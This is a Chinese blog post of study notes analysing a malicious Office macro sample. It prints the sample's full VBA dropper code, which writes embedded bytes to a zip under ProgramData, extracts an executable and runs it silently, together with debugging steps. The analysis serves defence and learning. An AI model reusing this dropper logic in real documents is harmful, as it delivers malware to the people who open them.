宏病毒(1)

最新推荐文章于 2024-02-19 05:37:09 发布
最新推荐文章于 2024-02-19 05:37:09 发布
阅读量579 收藏
点赞数
分类专栏: 学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41520029/article/details/103457154
版权

样本HASH:02BA9703D1F250B411EA4C868D17FD2E

先打开样本,发现是老版的宏警告。

然后点击启用宏,ALT+F11查看宏代码(打开之前可以按住shift,防止一切宏运行,但很多时候不好使),然后找到宏开始的地方,然后开始调试。

CTRL+F8运行到光标处,然后F8开始单步。

Sub userNaveLoadr()

    Dim path_Nave_file As String
    Dim file_Nave_name  As String
    Dim zip_Nave_file  As Variant
    Dim fldr_Nave_name  As Variant
    
    Dim byt() As Byte
    
    Dim ar1Nave() As String
    
    file_Nave_name = "hargardius"
    
    
    fldr_Nave_name = Environ$("ALLUSERSPROFILE") & "\Mldhrab\" 'C:\ProgramData\Mldhrab\
    
    If Dir(fldr_Nave_name, vbDirectory) = "" Then '判断有没有C:\ProgramData\Mldhrab\目录,没有就创建一个
        MkDir (fldr_Nave_name)
    End If
     
    
    zip_Nave_file = fldr_Nave_name & file_Nave_name & ".zip" '拼接为"C:\ProgramData\Mldhrab\hargardius.zip"
    
    path_Nave_file = fldr_Nave_name & file_Nave_name & ".exe" '拼接为"C:\ProgramData\Mldhrab\hargardius.exe"
    
     
    Dim arr
    
    arr = Split(Application.OperatingSystem, " ") '返回当前操作系统的名称和版本号,并使用空格分隔开。"Windows""(32-bit)""NT""6.01"
    
    If arr(3) = "6.02" Or arr(3) = "6.03" Then
        ar1Nave = Split(UserForm.weNaveBox.Text, "-")
    Else
        ar1Nave = Split(UserForm.wsNaveBox.Text, "-") '里面的值是窗体里的值
    End If
    
    Dim btsNave() As Byte
    
    Dim linNave As Double
    
    linNave = 0
    
    For Each vl In ar1Nave                  '把ar1Nave数组里面的值按字节读取到btsNave数组中
        ReDim Preserve btsNave(linNave)
    
        btsNave(linNave) = CByte(vl)
        
        linNave = linNave + 1
    Next

    
      
    Open zip_Nave_file For Binary Access Write As #2 '在C:\ProgramData\Mldhrab\目录生成hargardius.zip
         Put #2, , btsNave
    Close #2
   
    
     If Len(Dir(path_Nave_file)) = 0 Then '如果C:\ProgramData\Mldhrab\hargardius.exe长度为0,则解压C:\ProgramData\Mldhrab\hargardius.zip
        Call unNavezip(zip_Nave_file, fldr_Nave_name)
    End If


    Shell path_Nave_file, vbNormalNoFocus '执行exe文件
    
    
End Sub

  '解压函数
 Sub unNavezip(Fname As Variant, FileNameFolder As Variant)
    Dim FSO As Object
    
    Dim oApp As Object
   
    
    'Extract the files into the Destination folder
    Set oApp = CreateObject("Shell.Application")
    
    oApp.Namespace(FileNameFolder).CopyHere oApp.Namespace(Fname).items, &H4

    
End Sub

这个宏代码比较简单,都没做混淆。现在来看Shell path_Nave_file, vbNormalNoFocus 做了什么,首先是shell函数。

我们有多种方法来查看shell执行了什么:

一、Msgbox,万能弹窗

写代码 :MsgBox  path_Nave_file

设断点

执行

二、Debug.print,立即数窗口输出

写代码 :Debug.Print  path_Nave_file

设断点

执行

三、添加监视

通过添加监视,可以发现vbNormalNoFocus为shell函数的参数,值为4

EXE有空在分析,后面补上.......

FFE5
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
宏病毒防火墙
08-15
自己开发的宏病毒防火墙,安全无病毒请放心通过!亲测能保护office模版文件,禁止officeVB和宏自动运行,需要运行宏可在设置中设置! 目前只支持office2003和office2010!
脚本/宏病毒
flowerxxxxx的博客
06-30 571
一旦发现计算机Office软件打开后弹出系统警告框,并且无法“另存为”,就表示该文件已感染宏病毒,此时不能再打开其他文件,否则病毒也会感染,应马上关闭删除该文件。(3)用Win Hex分别打开notepad.exe和notepad_upx.exe文件(2分),再比较PE头部分,用语言描述有什么不同。在“受信任位置”中,删除“可靠来源”列表框中的不安全来源,根据实际情况设置是否信任所有安装的加载项和模板,设置宏的安全性;(3)描述清除病毒及加固的方法;(注:直接答在该题下面)(5分)
简单的弹窗病毒编程代码,python弹出窗口的代码
最新发布
yang0728y的博客
02-19 700
大家好,小编来为大家解答以下问题,python如何控制电脑产生弹窗,简单的弹窗病毒编程代码,今天让我们一起来看看吧!
v.rar_宏病毒
09-23
(1) 演示宏的编写 (2) 说明宏的原理及其安全漏洞和缺陷 (3) 理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识
清除宏病毒(StartUp.xls).pdf
12-13
清除宏病毒(StartUp.xls).pdf,有一天我的女朋友问我如何解决这个问题,我自己测试了下, 并记录下解决的过程!
Excel如何破解vba的宏密码及恶意文档样本分析
小龙人
02-07 5672
EXCEL破解VB宏密码,即解除工程属性的密码,恶意文档样本分析
WPS Office宏病毒实现shell反弹
Zyecho的博客
10-21 2390
WPS Office宏病毒实现shell反弹
恶意代码实验3:Word宏病毒实验
qq_63949327的博客
11-21 1018
只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。回答不正确三次,即可自动跳出病毒程序,但那时已经出现几十个文档。1、打开的宏编辑器如图所示,即可编写病毒代码。
Word宏病毒
热门推荐
qq_43717119的博客
06-22 1万+
Word宏病毒 【实验目的】 1、演示宏的编写。 2、说明宏的原理及其安全漏洞和缺陷。 3、理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。 【实验环境】 在windows虚拟机中演示word宏病毒的发生机制,以及如何清除病毒的一系列操作宏病毒样本:自我复制及感染病毒(copy.txt)类台湾一号病毒(No1.txt) 实验注意事项:为了保证该试验不至于造成较大破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。 【实验预备知识点】 Wo
记一次宏病毒分析
Boom!脑洞大爆炸的博客
06-18 496
记一次宏病毒分析
word文档宏病毒
m0_61368098的博客
09-10 1817
无限创建word文档来占用CPU资源,导致电脑宕机。注意在Normal下才是通用的,就是是个word文件在你的电脑上打开就会触发代码,在Project(新建 Microsoft Word 文档)下插入的代码只能用在这个word文档。
宏病毒查杀工具
05-27
不错的工具,本人亲自测试过确实非常的好用
office宏病毒专杀
05-27
office宏病毒专杀
宏病毒清除
09-28
OFFICE 宏病毒清除工具(含OFFICE宏病毒防火墙)
记一个宏病毒样本
WLINX
12-09 2398
在未知的道路上越来越菜——2019.10.18 拿到一个新样本,却连最基本的宏病毒都没分析清楚,是真的菜,首先,分析要有一个方向,方向错了,便会浪费很多时间,而从事安全这个行业,时间是异常宝贵的。所以,感觉自己需要写一篇博客来提醒自己...... 1、提取宏 首先这是一个宏病毒,多的不说,如果不想观察宏病毒的动态行为,就没必要打开宏病毒,用工具提取。前提是你得先装工具。 然后查看宏,心...
编写一个简易调试器
WLINX
05-17 2021
菜鸡的日常,复习一下调试器,简单CV点代码,调试器调试程序有两种方式,一种是创建进程,另一种便是附加: while (TRUE) { printf("1.创建新的调试进程\n"); printf("2.附加待调试的进程\n"); int input = 0; scanf_s("%d", &input); if (input == 1) { printf("请输入调试进程的路径:\n"); char Path[MAX_PATH] = { 0 }; scanf
HEVD之栈溢出
WLINX
05-15 878
自学习CVE-2017-11882漏洞后,便开始希望学习更多的漏洞,提高一下对漏洞的理解。在github上找到一个很好的项目,基本涵盖了所有漏洞(https://github.com/hacksysteam/HackSysExtremeVulnerableDriver)。 下载下来后,执行过后得到驱动文件HEVD.sys,以及漏洞利用程序HackSysEVDExploit.exe,然后开启双...
脱ZP壳笔记
WLINX
12-10 706
遇到一个较难的壳,记录一下。 样本HASH:1B9FD1D77A106CADF8485B03F44B7668 到达OEP,查看有没有抽取代码 随便跟进一个call,看到jmp到一个堆地址里面,说明是有抽取代码的,那就修改一下文件,但这壳有文件校验,那么先过一下文件校验。 过文件校验,先增加区段 运行,发现崩了,文件校验的原因,过它。。。 打开文件,OD载入,下断 bp Ma...
excel宏病毒专杀工具
09-06
1. 病毒扫描:该工具能够对Excel文件中的宏代码进行全面扫描,检测潜在的宏病毒。它可以识别已知的宏病毒特征,同时也能通过行为分析来检测未知宏病毒。 2. 病毒清除:一旦发现宏病毒,工具会立即进行清除操作,将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值